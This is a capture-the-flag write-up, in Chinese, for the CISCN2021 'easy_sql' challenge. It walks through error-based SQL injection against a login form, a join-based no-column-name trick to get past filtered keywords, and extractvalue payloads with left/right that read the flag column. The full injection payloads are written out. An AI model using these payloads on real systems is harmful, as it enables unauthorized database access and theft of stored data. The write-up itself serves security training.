[CISCN2021 Quals]easy_sql

easy_SQL

界面无回显，1’有回显1’'可以绕过。
抓包，sqlmap跑了一下，库security表users字段id,username,password.但没有用。
看了一下，是报错注入，手注了了一下。
首先看fuzz检测一下过滤了什么
前四个都过滤掉了。

库名可以报错注入出来，但是由于from(information_schema.columns)where(table_name)被过滤了。
不能继续使用extractvalue爆表名字。换一种姿势。
无列名注入。
http://www.wupco.cn/?p=4117

uname=' and (select * from (select * from users as a join users as b) as c)or'&passwd=1&Submit=%E7%99%BB%E5%BD%95

原理是在使用别名的时候join把表扩充成两份，在最后别名c的时候查询到重复字段，就成功报错。并且我们输入错误的表名字也会提示我们错误。

于是我尝试了CISCN，ciscn_flag,ciscn,flags,flag_ciscn,flag。
flag成功回显。

使用using函数查看其他表。

直接使用报错函数读取字段即可。
但由于flag过长需要使用left和right函数分别查看。
这里说一下带有-并不是纯数字的字段名，`` 可以使用这个符号来查询。

payload:uname=' and (extractvalue(1,concat(0x7e,(select(left(`811262b2-2204-49d3-9994-68199fc5dc35`,30))from(flag)),0x7e)))or'&passwd=1&Submit=%E7%99%BB%E5%BD%95
payload:uname=' and (extractvalue(1,concat(0x7e,(select(right(`811262b2-2204-49d3-9994-68199fc5dc35`,30))from(flag)),0x7e)))or'&passwd=1&Submit=%E7%99%BB%E5%BD%95